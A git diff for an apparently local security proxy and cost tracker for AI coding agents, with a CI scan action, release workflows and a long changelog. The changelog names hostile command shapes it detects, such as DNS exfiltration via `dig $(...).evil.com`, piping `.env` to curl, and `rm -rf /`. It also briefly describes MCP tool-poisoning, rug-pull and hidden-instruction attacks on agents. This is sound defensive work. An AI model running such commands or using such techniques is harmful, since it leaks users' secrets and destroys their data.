diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
new file mode 100644
index 0000000..8c2658b
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -0,0 +1,51 @@
+---
+name: Bug report
+about: Something isn't working as expected
+title: ""
+labels: bug
+assignees: ""
+---
+
+
+
+## What happened
+
+A clear description of the problem.
+
+## What you expected
+
+What you expected to happen instead.
+
+## Steps to reproduce
+
+1.
+2.
+3.
+
+## Diagnostic bundle
+
+Paste the output of `burnwall doctor --export` (it's redacted + self-scanned):
+
+```
+(paste here)
+```
+
+## Environment
+
+- Burnwall version:
+- OS / arch:
+- AI tool(s) involved:
+
+## Anything else
+
+Logs, screenshots, or context. Please don't paste API keys or prompt content —
+the `doctor --export` bundle already excludes them.
diff --git a/.github/actions/burnwall-scan/action.yml b/.github/actions/burnwall-scan/action.yml
new file mode 100644
index 0000000..b7a08ee
--- /dev/null
+++ b/.github/actions/burnwall-scan/action.yml
@@ -0,0 +1,75 @@
+name: 'Burnwall Scan'
+description: >-
+  Scan agent config files (CLAUDE.md, .cursorrules, .mcp.json, .claude/ and
+  friends) for committed credentials and hidden-instruction smuggling, and
+  upload the findings as SARIF to the repository Security tab.
+author: 'Burnwall'
+branding:
+  icon: 'shield'
+  color: 'orange'
+
+inputs:
+  paths:
+    description: 'Space-separated files or directories to scan.'
+    required: false
+    default: '.'
+  all-files:
+    description: 'Scan every text file in directories, not just known agent configs.'
+    required: false
+    default: 'false'
+  fail-on-findings:
+    description: 'Fail the job when anything is found (in addition to the SARIF upload).'
+    required: false
+    default: 'false'
+  upload-sarif:
+    description: >-
+      Upload the SARIF report to GitHub code scanning. Requires the
+      `security-events: write` permission on the job.
+      Set to false to only
+      print findings (and optionally gate via fail-on-findings).
+    required: false
+    default: 'true'
+  burnwall-version:
+    description: 'Burnwall release to install (for example "0.9.15"). Defaults to the latest release.'
+    required: false
+    default: 'latest'
+
+runs:
+  using: 'composite'
+  steps:
+    - name: Install Burnwall
+      shell: bash
+      env:
+        # Inputs reach the script through the environment rather than being
+        # expanded into the script text, so a crafted value cannot inject
+        # shell commands.
+        INPUT_BURNWALL_VERSION: ${{ inputs.burnwall-version }}
+      run: |
+        if [ "$INPUT_BURNWALL_VERSION" != "latest" ]; then
+          export BURNWALL_VERSION="$INPUT_BURNWALL_VERSION"
+        fi
+        curl -fsSL https://raw.githubusercontent.com/intbot/burnwall/main/install.sh | sh
+        echo "$HOME/.local/bin" >> "$GITHUB_PATH"
+
+    - name: Scan agent configs
+      shell: bash
+      env:
+        INPUT_PATHS: ${{ inputs.paths }}
+        INPUT_ALL_FILES: ${{ inputs.all-files }}
+        INPUT_FAIL_ON_FINDINGS: ${{ inputs.fail-on-findings }}
+      run: |
+        ARGS=""
+        if [ "$INPUT_ALL_FILES" = "true" ]; then ARGS="$ARGS --all-files"; fi
+        if [ "$INPUT_FAIL_ON_FINDINGS" = "true" ]; then ARGS="$ARGS --fail-on-findings"; fi
+        # fail-on-findings exits non-zero AFTER writing the SARIF report, so
+        # the upload step still runs (`if: always()` below) and the Security
+        # tab gets the findings either way.
+        # `paths` is space-separated, so $INPUT_PATHS is left unquoted on
+        # purpose: word splitting turns it into separate arguments.
+        burnwall scan $INPUT_PATHS --sarif burnwall-scan.sarif $ARGS
+
+    - name: Upload SARIF to code scanning
+      if: ${{ always() && inputs.upload-sarif == 'true' }}
+      uses: github/codeql-action/upload-sarif@v3
+      with:
+        sarif_file: burnwall-scan.sarif
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index b938a67..82ad3c2 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -112,6 +112,10 @@ jobs:
     env:
       GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
       BUILD_MANIFEST_NAME: target/distrib/${{ join(matrix.targets, '-') }}-dist-manifest.json
+    permissions:
+      "attestations": "write"
+      "contents": "read"
+      "id-token": "write"
     steps:
       - name: enable windows longpaths
         run: |
@@ -144,6 +148,30 @@ jobs:
           # Actually do builds and make zips and whatnot
           dist build ${{ needs.plan.outputs.tag-flag }} --print=linkage --output-format=json ${{ matrix.dist_args }} > dist-manifest.json
           echo "dist ran successfully"
+      # NOTE: manual patch over the cargo-dist-generated workflow — re-apply
+      # after `dist generate`. Retries build-provenance attestation up to 3x
+      # because Sigstore's transparency log intermittently returns a transient
+      # "InternalError: error fetching tlog entry". Attestation stays MANDATORY:
+      # the final attempt is not continue-on-error, so a persistent Sigstore
+      # outage still fails the job (we never ship an un-attested release).
+ - name: Attest + id: attest1 + continue-on-error: true + uses: actions/attest@v4 + with: + subject-path: "target/distrib/*${{ join(matrix.targets, ', ') }}*" + - name: Attest (retry 1) + id: attest2 + if: steps.attest1.outcome == 'failure' + continue-on-error: true + uses: actions/attest@v4 + with: + subject-path: "target/distrib/*${{ join(matrix.targets, ', ') }}*" + - name: Attest (retry 2) + if: steps.attest1.outcome == 'failure' && steps.attest2.outcome == 'failure' + uses: actions/attest@v4 + with: + subject-path: "target/distrib/*${{ join(matrix.targets, ', ') }}*" - id: cargo-dist name: Post-build # We force bash here just because github makes it really hard to get values up diff --git a/.github/workflows/scorecard.yml b/.github/workflows/scorecard.yml new file mode 100644 index 0000000..080aa39 --- /dev/null +++ b/.github/workflows/scorecard.yml @@ -0,0 +1,45 @@ +# OpenSSF Scorecard — supply-chain health signal for a zero-telemetry tool. +# A local tool can't use product analytics for trust; a published Scorecard + +# the dist-built reproducible release artifacts stand in for it. 
+name: Scorecard + +on: + branch_protection_rule: + schedule: + - cron: "37 4 * * 1" # weekly, Monday + push: + branches: ["main"] + +permissions: read-all + +jobs: + analysis: + name: Scorecard analysis + runs-on: ubuntu-latest + permissions: + security-events: write # upload SARIF to the Security tab + id-token: write # publish results to the public Scorecard API + steps: + - name: Checkout + uses: actions/checkout@v5 + with: + persist-credentials: false + + - name: Run analysis + uses: ossf/scorecard-action@v2.4.0 + with: + results_file: results.sarif + results_format: sarif + publish_results: true + + - name: Upload artifact + uses: actions/upload-artifact@v5 + with: + name: scorecard-results + path: results.sarif + retention-days: 5 + + - name: Upload to code-scanning + uses: github/codeql-action/upload-sarif@v3 + with: + sarif_file: results.sarif diff --git a/CHANGELOG.md b/CHANGELOG.md index b60c34b..bf0645f 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -2,6 +2,629 @@ All notable changes to Burnwall. +## [0.11.0] — 2026-06-17 + +A dashboard-polish release: clearer, more glanceable surfaces, plus two new +cost views and a security hardening — all built on data Burnwall already +captures on the wire. Still zero telemetry, still a single local binary. + +### Added + +**Cost** +- **`burnwall accuracy`** — contrast your real on-the-wire, cache-aware cost with + a naive token tally (every prompt token charged at the base input rate, the + shortcut a log-only estimator takes when it ignores cache reads). For + cache-heavy coding sessions the naive tally can overstate the bill by a wide + margin; this shows by how much, per model. +- **`burnwall tags`** — attribute spend by your own labels. Set the opt-in + `x-burnwall-tags` header (e.g. `feature=auth,agent-run=run42,client=acme`) and + Burnwall rolls spend up by key → value, locally, with cost and request counts. 
+ +**Surfaces** +- **Delta-vs-previous chips** on the stat cards: `burnwall status` compares to + yesterday, `burnwall history` to the prior window, coloured by whether the move + is good or bad (spend up = caution, cache up = good). +- **Share-of-spend bars** in the cost-by-model tables, so the dominant model is + obvious at a glance. +- **Daily-spend sparkline** in `burnwall history`, and a 7-day spend trend on + `burnwall status`. +- **VS Code panel:** a spend-trend chart, delta chips, and share bars — rendered + with a baked, script-free SVG so it works under the panel's locked-down webview + and adapts to your editor theme. + +**Security** +- **MCP tool fingerprints now use SHA-256** (collision-resistant). The upgrade is + migrated in place: an already-approved tool is re-pinned to the new format + silently and is **not** re-prompted by the format change alone — only a genuine + change to the tool still resets approval. + +## [0.10.0] — 2026-06-12 + +A large release: a wave of security, cost, and compliance features, plus an +availability-hardening pass driven by dogfooding — so the proxy stays safe to run +hands-off even when something outside Burnwall (an antivirus, a crash) takes it down. + +### Added + +**Security** +- **Scan agent config files for committed secrets + hidden instructions.** `burnwall + scan <paths>` checks `CLAUDE.md` / `.cursorrules` / `.mcp.json` / `.claude/` and + friends for committed credentials and invisible-Unicode instruction smuggling, with + SARIF output. A one-line **GitHub Action** runs it in CI and posts findings to the + repository's Security tab. +- **Teach your agent about Burnwall.** `burnwall skills install` drops a guide where + Claude Code and Codex discover it, so the agent can read your spend, explain a block, + and run the file scanner — but never weaken protection itself. 
+- **Decode-then-scan + invisible-text scrubbing.** Obfuscated (base64/hex) and + zero-width-Unicode payloads inside tool calls are un-hidden before checking. +- **Canary trap.** Plant a fake credential; if it ever tries to leave the machine, the + request is blocked and a tamper-proof receipt is sealed. +- **Egress checks for file uploads and credential misdirection** (opt-in), a + **silent-billing watchdog** (warns when a session flips from subscription to metered), + and a **slow-drip exfiltration monitor** (warn-only). +- **Per-project MCP allowlist** — restrict which MCP servers an agent may reach, per repo. +- **Paranoid mode** (opt-in) — fail closed: block a request the scanner cannot inspect, + for users who prefer that over the fail-open default. +- **Image/link exfil warning** (opt-in, warn-only) — flags a model reply that embeds a + data-carrying image URL, the zero-click exfiltration pattern. + +**Cost** +- **Per-repo / per-client cost export** to CSV, correct even when several projects run + at once. +- **`burnwall wire-check`** — compare your real on-the-wire spend with a log-scrape + estimate. +- **Cache-dead-zone warning**, an **hourly spend brake** (opt-in), and an optional + **cheaper-model fallback** when you hit a budget cap instead of stopping work. +- **Tool-output trim** (opt-in) — middle-truncate oversized tool results before they + re-enter context, with an in-band marker, to cut token cost. + +**Compliance** +- **SPDX 3.0 AI-profile bill-of-materials** and framework-labelled evidence packs on top + of the existing CycloneDX AIBOM + SARIF exporters; a control crosswalk rides on blocks. + +**Integration** +- **Sit in front of a gateway you already use.** A new `[upstreams]` config (and + `--upstream-*` flags) chains Burnwall ahead of any OpenAI- or Anthropic-compatible + gateway, keeping cross-tool spend tracking and enforcement on top. 
+ +**Resilience** +- **`burnwall recover`** — get unstuck if the proxy dies under you: pauses routing so new + shells go direct, and explains how to restore already-open tools. +- **`burnwall guard`** — a watchdog that auto-pauses routing if the proxy dies while + routed, so a crash or quarantine can't strand new shells. + +**Diagnostics & data** +- **`burnwall doctor`** — a one-glance health check that names what's wrong and the exact + fix, with `burnwall doctor --export` writing a redacted, metadata-only bundle that + self-scans for secrets before it's written (and refuses to write if anything + secret-shaped survives) — the thing to attach to a bug report. +- **`burnwall explain `** — explain any block in plain language: what rule fired, a + masked preview of what matched, why that class is blocked, and how to proceed. +- **`burnwall export --format csv|json`** — a portable copy of your metadata, on your + machine, any time. +- **Rule reference + troubleshooting docs.** Every block carries a stable rule id that + resolves to a `docs/RULES.md` entry (mirrored by `burnwall explain`), plus a + symptom→fix `docs/TROUBLESHOOTING.md` and a diagnostic-first bug-report template. + +### Changed +- **Graceful drain on stop.** `burnwall stop` (and `upgrade`) now let in-flight requests + finish before exiting instead of cutting them mid-stream. +- **A crash, forced kill, or antivirus quarantine is now diagnosed.** `burnwall start` + notices an unclean prior exit and, on a streak, points at the likely cause (an + antivirus quarantining the unsigned binary) with the fix. Panics in background tasks + are now written to the log instead of vanishing silently. +- **Status-line block count** reads `🚫 N blocked` and no longer renders the digit on top + of the shield glyph in some terminals. 
+- **Status-line context reads true.** The context gauge no longer snaps toward ~100% off + a stale plan window — it shows the tool's own headroom figure (the one `/usage` reports) + and marks it stale rather than implying the conversation is nearly full. +- **Blocks and alerts are reported separately.** A warn-only security alert is no longer + counted as a block: `burnwall status` shows the two side by side, and the nudge line + reads "blocked N request(s)" versus "raised N security alert(s)" honestly. +- **Windows install note.** The README and the installer now explain the + Defender/SmartScreen false positive and how to recover from it. + +### Fixed +- **Fewer false security blocks**, each locked with a regression test: a + credential-shaped string in resent conversation history (including a `/compact` + summary), an editor tool writing a key into a local test fixture, a search query that + mentions a sensitive path, and a tool's non-command metadata field no longer 403 — + while a genuine credential or dangerous command inside an actual tool call still blocks. +- **MCP watcher description-drift state is now per-watcher.** The advisory "a tool changed + its description" memory was process-global, so two watchers — or an ephemeral upstream + port reused by a different server — could leak sightings into each other (a flaky test + surfaced it). It's now scoped to each watcher instance; enforcement was never affected. + +## [0.9.15] — 2026-06-10 + +A follow-up from live dogfooding: kill a false-positive class that could wedge a +whole session, make every block explain itself, give false positives a live +escape hatch, and stop surfaces from showing stale numbers when the proxy is +down. 
+ +### Added +- **`burnwall pause` / `resume` / `allow-once` — a live escape hatch.** After a + block you believe is a false positive, `burnwall allow-once` lets exactly the + next request through (then protection restores itself), and `burnwall pause + [5m]` relays everything unchecked for a bounded window — both take effect on + the running proxy with no daemon or AI-tool restart, so the agent's session + survives. Pauses auto-expire (default 5 minutes, capped at 24 hours), an + unused allow-once expires after 10 minutes, and every status surface shows a + loud `⏸ PAUSED` warning with a countdown for the whole window. Block messages + now point at these toggles; the previous advice (an environment variable plus + a tool restart) never reached a backgrounded daemon and has been removed. + +### Fixed +- **A secret-shaped token in conversation history no longer blocks the session.** + Security data checks (credentials, cards, SSNs) now run only inside tool-call + arguments — the agent *action* — never on prose or resent conversation history. + Clients resend the full conversation every turn, so a key-shaped string merely + *quoted or discussed* (e.g. an example key in a summary) used to 403 every + request until the session was abandoned. The exfiltration vector that matters — + a credential leaving the machine inside a tool call — stays fully covered. +- **Subscribers no longer see a notional dollar figure where a plan reading + belongs.** When the latest plan reading is stale (idle, or the proxy was briefly + down), the status line keeps showing last-known plan headroom — marked stale — + instead of falling back to a session-cost figure that reads as real money. The + `status` command frames a subscriber's spend as notional, not a budget breach. + +### Changed +- **Blocks now explain themselves.** A security block names the tool that tripped + it, shows a masked, recognisable preview of what matched (e.g. 
`AKIA…LKEY`) for + credential/PII hits — the raw value is never echoed or logged — and states why + that class is blocked, instead of a bare category label. +- **A down proxy now looks down.** When routing points at a dead proxy, status + surfaces drop the cost, plan, today, and block-count segments (all stale with no + capture happening) and show only the loud "proxy down" warning alongside the + tool-reported token and context gauges. + +## [0.9.14] — 2026-06-10 + +A real-world robustness pass driven by dogfooding: a multi-agent review of +every feature, focused on the failure modes that make a tool freeze, falsely +block, or mislead — the kind that trigger an uninstall. + +### Fixed + +- **The daily budget now resets at midnight.** A long-running proxy used to + accumulate spend across days and eventually return "budget exceeded" on every + request even though the day's real spend was small. The counter is now + day- and month-aware (restart- and clock-change-proof), and the monthly cap + is actually enforced. +- **Loop detection no longer gets stuck on retries.** A blocked request (and a + client's automatic retry of it, or a retry after a provider outage) no longer + feeds the loop-detection window, so a transient blip can't wedge a session + into a permanent 429 loop. Blocks now carry a `Retry-After`, and the window is + keyed per method/provider/path so unrelated requests don't collide. +- **Fewer false security blocks.** Writing or discussing a file that merely + mentions a sensitive path (e.g. `~/.ssh` in a README) no longer 403s — only + shell-tool arguments get command checks. Windows paths in tool arguments are + no longer mistaken for network mounts, scoped deletes like `rm -rf /tmp/x` + pass, and well-known documentation/example keys are exempt. Blocks now explain + what was caught and how to proceed, and `burnwall report-bug` writes a + sanitized local report for false positives. 
+- **The proxy no longer hangs on a stalled or unreachable upstream**, and + cancelling a request (Esc) stops the upstream instead of billing the full + response. +- **Accurate cost capture for more tools.** OpenAI's Responses API (used by + Codex) is now parsed instead of silently recording $0, unknown models warn + instead of recording $0, and the cross-tool "today" total no longer + double-counts traffic that went through the proxy. + +### Changed + +- **A crashed or stopped proxy no longer breaks your terminals.** Shell routing + is liveness-gated: if the proxy isn't running, a new shell talks directly to + the provider (unprotected but working) instead of failing to connect. Every + status surface shows a clear "proxy down" warning when routing points at a + dead port. PowerShell now gets persistent routing like the other shells. +- Plan-aware budgeting: on a flat-rate subscription, the dollar cap is treated + as advisory (tracked and warned, not blocked) unless you opt in. +- Hardening across MCP (prose-safe scanning, clearer approval errors), the audit + chain (lost-key detection), storage (schema versioning), and the daemon + (a real log file, PID identity checks). + +## [0.9.13] — 2026-06-09 + +### Fixed + +- **Talking *about* a denied path or command no longer blocks the request.** + The proxy's security scan previously applied every rule to every string in + the request body, so a system prompt, chat message, tool definition, or tool + result that merely *mentioned* `~/.ssh` or `rm -rf` returned a 403 — e.g. a + project's CLAUDE.md documenting a deny list made every Claude Code request + from that repo fail (surfacing in the client as a bogus "run /login" auth + error). 
Command-shaped rules (denied paths/commands, network mounts, + destructive commands, exfil techniques) now apply only inside tool-call + argument subtrees (Anthropic `tool_use.input`, OpenAI + `tool_calls`/`function_call` arguments, Gemini `functionCall`) — the places + an agent actually acts. Secret detection and DLP still scan the entire + payload, and MCP `tools/call` bodies keep the strict whole-body scan. +- **A blocked tool call no longer poisons the conversation forever.** Clients + resend the full history on every request, so one (correctly) blocked call + used to re-trigger the 403 on every subsequent message — the only escapes + were a new conversation or the bypass switch. Command-shaped rules now apply + to the **latest assistant turn's in-flight tool round** only: the request + carrying the dangerous call (and its results) is still blocked, but once the + user sends a new message that round is adjudicated history and the + conversation continues. Secrets/DLP still scan all turns, so sensitive + content in old results stays caught. +- **`burnwall stop` no longer strands routed shells on a dead proxy.** Stopping + the proxy used to leave `ANTHROPIC_BASE_URL`/`OPENAI_BASE_URL` pointing at + the closed port, so every AI tool failed with a connection error until the + user discovered `disable-routing`. `stop` now pauses routing (new shells go + direct), prints how to clear the variables from already-open terminals, and + `start` resumes routing automatically. An explicit `burnwall + disable-routing` is remembered and never overridden by `start`; opt out of + the coupling with `stop --keep-routing` / `start --no-routing`. + +### Added + +- **`uninstall` now removes routing env files instead of stubbing them, and + warns about already-open terminals.** The leftover banner-only stub was + residue on a machine the user asked to clean, and it kept counting the + shell as "configured" forever (fish/PowerShell are detected by env-file + presence). 
Uninstall also can't pull env vars out of running shells — no + uninstaller can — so it now says so and prints the per-shell unset command. + +- **Pricing for Claude Fable 5 and Opus 4.8** (both released 2026-06-09): + `claude-fable-5` at $10/$50 per MTok (cache write $12.50, read $1.00) and + `claude-opus-4-8` at the standard Opus $5/$25. Pricing lookup now also + resolves bracket variant tags — Claude Code requests the 1M-context tier as + `claude-fable-5[1m]`, which previously fell through to "unknown model". + +## [0.9.12] — 2026-06-09 + +### Fixed + +- **Routing commands now act on every configured shell, not just the detected + one.** A user often drives more than one shell (on Windows, PowerShell *and* + Git-bash are the norm). Previously `enable-routing` / `disable-routing` / + `uninstall` resolved a single shell and touched only its env file + rc hook, so + enabling from PowerShell left bash silently unrouted (and `uninstall` could + leave a live rc hook pointing at a removed proxy). They now sync the detected + shell **plus** every shell already configured for routing, keeping them + consistent. Bash/zsh are disambiguated by their rc-hook (they share one + `env.sh`); fish/PowerShell by their own env files — so a never-used shell is + never pulled in (no spurious `~/.zshrc`). + +### Added + +- **Not-routed warning on the Claude Code status line.** When a tool's traffic + isn't flowing through the proxy, the ribbon shows a loud `⚠ DIRECT + (unprotected)` chip (and `⚠ bypass` when `BURNWALL_BYPASS` is set) right after + the model — so "the proxy is running but my traffic isn't reaching it" can't go + unnoticed. Detected from the tool's `*_BASE_URL` in the environment the status + line inherits; silent on the healthy path. +- **Routing readout in `burnwall status`.** A per-shell line states whether this + shell points traffic at the proxy, with the one-line fix when it doesn't; also + surfaced as `env_routing` in `status --json` for the editor extension. 
+- **Colorized console output.** The install scripts (`install.sh` / `install.ps1`), + the proxy banner, the background-start and login-service messages, and the + routing/coverage readouts now use semantic color (green = active/healthy, + yellow = caution, red = unprotected). Honors `NO_COLOR` and non-TTY output, so + piped/redirected text stays clean. + +## [0.9.11] — 2026-06-08 + +### Added + +- **Subscription-aware status, across every surface.** For a Claude Pro/Max plan, + dollar figures are notional (you pay a flat rate), so Burnwall now shows what's + actually scarce: your usage-window headroom. The proxy reads Anthropic's + `anthropic-ratelimit-unified-*` response headers (rolling 5-hour + 7-day windows) + off traffic it already forwards and persists a small, non-sensitive, **per-provider** + snapshot; surfaces render e.g. `5h [▓░░░░░░░] 17% (1h56m) · 7d 10%` in place of the + dollar segment, leading with whichever window the provider reports as binding and + flagging a throttled status. Auto-detected (a subscription emits these headers, an + API key doesn't — verified against Anthropic's docs), so API users keep the + dollar/cost view with no configuration; falls back to dollars when no fresh snapshot + exists. Surfaced on: + - the **Claude Code status line** (`burnwall statusline`); + - **`burnwall watch`** — the cross-tool pane for CLIs without their own status bar + (Codex, Aider, …): run it in a split pane to see the gauge; + - **`burnwall watch --title`** — emits the ribbon as a terminal-title (OSC) escape, + for a shell prompt hook or `tmux status-right`, so even a status-bar-less CLI gets + it in the window title; + - **`status --json`** — a `plan` block (per-provider windows + reset countdown), + rendered by the **VS Code / Cursor / Windsurf extension** status bar + tooltip. 
+ + The capture is provider-generic; OpenAI/Google hooks exist but return nothing until + their subscription signal is probed and verified (we don't synthesize a window from + per-minute API limits). + +- **Coverage readout — which of your tools are actually behind the firewall.** A + proxy only protects traffic that flows through it, and the dangerous failure mode + is *silent* non-coverage — a tool you assume is protected whose traffic never + reaches Burnwall. Burnwall now makes coverage visible per installed tool: + - **`burnwall init`** warns at setup when a detected tool is in a bypassing mode — + concretely, Codex signed in with ChatGPT login (read from `~/.codex/auth.json`, + a local non-secret mode flag), whose traffic goes to the ChatGPT backend over + OAuth and can't be routed through any no-MITM proxy. It notes that API-key + mode would route through Burnwall but bills per-token — an informed trade-off, + not a blanket "switch." + - **`burnwall status`** and **`burnwall watch`** show a per-tool **Coverage** + section: *protected* (provider seen routing recently), *installed but no traffic + seen*, or *bypasses*. `status --json` carries a `coverage` array, and the VS Code + / Cursor / Windsurf extension surfaces a `⚠ unprotected` warning plus a + tooltip breakdown. + - README documents the boundary outright. + +- **More official security rule packs.** The bundled, signed-release rule packs + grew from 4 to **8** — added `node`, `python`, `go`, and `kubernetes`, and + fleshed out `django` / `react` / `infrastructure` / `data-science` (now ~61 + rules total). Each targets unambiguously sensitive credential/state files + (`.npmrc`, `.pypirc`, kubeconfigs, `terraform.tfstate`, …) and genuinely + destructive commands, keeping the low-false-positive bar. Install with + `burnwall rules install <pack>`; list with `burnwall rules list`. 
+- **`burnwall rules lint`** — validate a rule pack against strict acceptance rules + (stricter than the runtime: forbidden/unknown keys, uncompilable or over-broad + rules are hard errors), optionally verifying its signature (`--sig`). Exits + non-zero on any error and supports `--json`, so it can gate a community rule + repo's CI. The bundled official packs are themselves checked by it in CI. + +### Changed + +- Status ribbon now carries a `burnwall` wordmark — `🔥 burnwall · <model> · …` — + across every surface (Claude Code status line, `burnwall watch`, editor status + bar), which share one renderer. +- `short_model` now keeps a trailing context-variant tag and upper-cases it, and + no longer lets it defeat the version dotting: `claude-opus-4-8[1m]` renders as + `opus-4.8[1M]` (was `opus-4-8[1m]`). + +## [0.9.10] — 2026-06-08 + +### Added + +- **`burnwall init` now wires up the Claude Code status line.** When Claude Code + is detected, `init --apply` merges a `statusLine` block into + `~/.claude/settings.json` so the Burnwall ribbon (model · ↑/↓ tokens · spend) + appears automatically — no hand-editing JSON. The merge is idempotent, + preserves your other settings, writes the PATH-resolved `burnwall statusline` + command, and never overwrites a status line you already configured. +- **`burnwall uninstall`** — one command to undo everything `install` + `init` + set up: stops the proxy, removes the login service, removes the Claude Code + status line (a foreign one is left untouched), empties the routing env file and + removes the rc-source hook, and removes the binary. Your cost-history database + is kept by default; `--purge` deletes the whole `~/.burnwall` data directory. + Confirms before acting (skip with `--yes`); refuses to run non-interactively + without `--yes`. 
+ +### Changed + +- `burnwall upgrade` now sweeps the leftover `burnwall.exe.old` from a previous + Windows self-upgrade on the next launch, so the transient renamed binary never + lingers (best-effort, silent; the running binary can't delete itself). + +## [0.9.9] — 2026-06-08 + +### Added + +- **`burnwall upgrade`** (alias `self-upgrade`) — one command to move to the + latest release. It stops the running proxy first (a live `burnwall.exe` can't + be overwritten on Windows), runs the installer, and restarts the proxy. On + Windows it renames its own running binary aside so the installer can write the + new one, restoring it if the install fails. `--dry-run` to preview, + `--no-restart` to skip the restart. The mirror of `self-rollback`. + +## [0.9.8] — 2026-06-07 + +### Added + +- **`burnwall savings`** — your own *measured* cache-savings report: dollars + recovered through caching over a window (from real token buckets at published + cache-read vs base-input rates), plus models that are underusing caching. No + marketing percentages — your numbers. +- **`burnwall watch` / `status` self-test heartbeat** — `status` now states + plainly whether protection is live ("proxy running (pid …); every request is + scanned"), so a passive proxy never leaves you wondering if it's working. +- **`burnwall share`** — an opt-in, screenshot-friendly, **signed** value card + (spend / cache savings / blocks), verifiable against the local audit key so the + numbers can't be faked. Nothing leaves your machine. +- **`burnwall sidecar`** — run the proxy as a co-located egress point for an + agent that executes off your laptop (self-hosted sandbox / container / CI + runner), with the in-sandbox env-var recipe. Same scanning + budgets; not a + TLS-terminating proxy (no CA injection — see `SECURITY.md`). 
+- **Catastrophic-command detection by shape** — recursive-force deletes, disk + destruction (`dd of=/dev/…`, `mkfs`), and destructive SQL (`DROP`/`TRUNCATE`) + are blocked regardless of flag order, spacing, or target expansion — the forms + that slipped past literal/approval checks in real incidents. +- **Data-exfiltration technique detection** (opt-in under `security.dlp`): DNS + exfiltration, secret-file-piped-to-network, command-substituted uploads. +- **Per-session / swarm budget ceiling** (`budget.per_session`, opt-in via an + `x-burnwall-session` request header) — agents in a fan-out that share a session + id share one blast-radius cap; `status` shows a per-session breakdown. +- **Build provenance** — releases now carry GitHub Artifact Attestations (SLSA + Build L2); verify with `gh attestation verify … --repo intbot/burnwall`. New + `SECURITY.md` documents integrity + TLS handling (rustls, no CA injection, no + plaintext at rest), backed by a guard test. + +### Changed + +- `command_matches` is whitespace-normalized, so padding (`rm -rf /`) can't + evade a literal deny rule. +- README: "Verify your download" + the trust/defense-in-depth sections. + +## [0.9.7] — 2026-06-07 + +### Added + +- **Data-exfiltration technique detection** (opt-in, under `security.dlp`) — the + scanner now flags the exfiltration *method* in a tool-call argument, not just + secrets in the payload: DNS exfiltration (`dig $(...).evil.com`, encoded + subdomains), a secret file piped to the network (`cat .env | curl -d @-`), and + command-substituted uploads. Conservative/high-signal (a network tool alone is + fine) and names only the technique, never the data. +- **`burnwall security --summary`** — a "what Burnwall caught for you" receipt: + blocks grouped by type over the window (pairs with `--days 7`), so passive + protection registers as ongoing value instead of going unseen. 
+- **`burnwall audit pack`** — one-command compliance evidence pack: bundles the + signed hash-chained receipts, the CycloneDX 1.6 AIBOM, and the SARIF 2.1.0 + security findings into a directory with a `MANIFEST.md` that maps each artifact + to the controls auditors ask for (ISO/IEC 42001, EU AI Act Art. 12/26, FINRA). + The artifacts already existed; this is one command + the framework mapping you + can hand a security team. +- **MCP firewall is validated against the published attacks** — a test corpus + models the real PoCs (Invariant tool-poisoning / SSH-key exfiltration, the + MCPoison rug-pull that swaps a tool's behavior after approval, `` + shadowing) so coverage is provable and stays covered. + +### Changed + +- README: a **Trust & privacy** section (local, zero-telemetry, read-only on + responses, signed single-binary releases, auditable "no network except + forwarding"), a **defense-in-depth** framing for security (rules run before + anything leaves your machine; complements — doesn't replace — native + controls), and the MCP scope note now points at the built-in `mcp-watch` + firewall (tool-poisoning + rug-pull detection). + +## [0.9.6] — 2026-06-07 + +### Added + +- **`burnwall watch`** — a live, cross-tool status ribbon for a spare terminal + pane. The in-TUI ribbon only works in Claude Code; this shows the *same* + renderer for every tool that routes through the proxy (Codex, Gemini, Aider, + …), sourced from the local database. `--oneline` for a compact line, `--once` + for a single frame (scripting/tests), `--interval` for the fallback refresh. + It refreshes event-driven off the `watch.signal` marker the proxy touches each + turn, with a periodic fallback. The headline figure is **today's spend across + all tools** — the cross-tool number no single tool shows. 
+- The status ribbon's context gauge stays honest on this surface: no tool feeds + an exact context %, so it's an estimate (`~`) when the model's window is known + and the prompt fits, and `—` otherwise — never an unqualified number. + +### Changed + +- Ribbon cost fields (`sess`, `today`) are now rendered only when known, so the + cross-tool view (which has no per-session concept) shows per-message + today + without a misleading "session" figure. + +## [0.9.5] — 2026-06-07 + +### Added + +- **`burnwall statusline`** — renders the Burnwall ribbon for Claude Code's + customizable status line. Reads Claude Code's per-turn JSON on stdin and prints + one line: `🔥 sonnet-4.6 · ↑13k ↓615 · $0.05 msg $0.16 sess · $2.40 today · ctx + [▓▓░░░░░░] 22%`. Per-message cost is derived from the cumulative session total; + today's spend and security-block count are enriched from the proxy database, so + the line reflects spend **across all your tools**, not just the current one. + Wire it up with one line in `~/.claude/settings.json`: + `{ "statusLine": { "type": "command", "command": "burnwall statusline" } }`. + Fail-open: malformed input or an unreadable database still yields a best-effort + line rather than breaking the editor. +- **Context gauge is honest by construction** — the ribbon shows a context-window + percentage only when it's *exact* (reported by the tool, e.g. Claude Code). + Where a value is estimated it's flagged with `~`; where the window can't be + trusted it renders `—`; where the tool already shows its own gauge it's omitted + rather than duplicated. +- **Activity marker** — the proxy touches `/watch.signal` after each + recorded turn (off the response path, so no added latency), laying the + groundwork for event-driven refresh of upcoming status surfaces. 
+ +### Fixed + +- **`burnwall install-service` on Windows no longer needs admin.** It previously + created a Scheduled Task at the Task Scheduler library root, which requires + elevation and failed with "Access is denied" for a normal shell. The default is + now a per-user `HKCU\…\Run` registry entry that launches `burnwall start + --daemon` at logon — no UAC. `--task` opts back into the Scheduled-Task variant + (which adds crash-restart) for users who run an elevated terminal. + `uninstall-service` removes whichever was installed. + +## [0.9.4] — 2026-06-07 + +### Added + +- **Five-layer graceful-degradation model**, so a bad release can't break your AI + tools: + - `BURNWALL_BYPASS=1` — instant kill-switch. Proxy becomes a pure relay; no + security scan, no budget check, no storage write. Forward bytes to the + upstream and stream the response back unchanged. + - **Panic-catching wrapper** — if anything in the request pipeline panics, the + proxy returns a clear 502 (pointing the user at `BURNWALL_BYPASS=1`) instead + of dropping the connection. + - **Crash-loop circuit breakers** baked into each platform's service unit + (launchd `ThrottleInterval=60`, systemd `StartLimitBurst=5`, Task Scheduler + `RestartOnFailure` capped at 5 attempts). + - **`burnwall self-rollback <version>`** — fetches the version-pinned dist + installer for any prior release and reinstalls. 